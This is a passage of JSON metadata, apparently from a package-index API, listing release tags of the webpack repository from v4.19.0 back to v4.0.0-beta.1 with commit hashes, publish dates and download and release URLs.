url":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://rep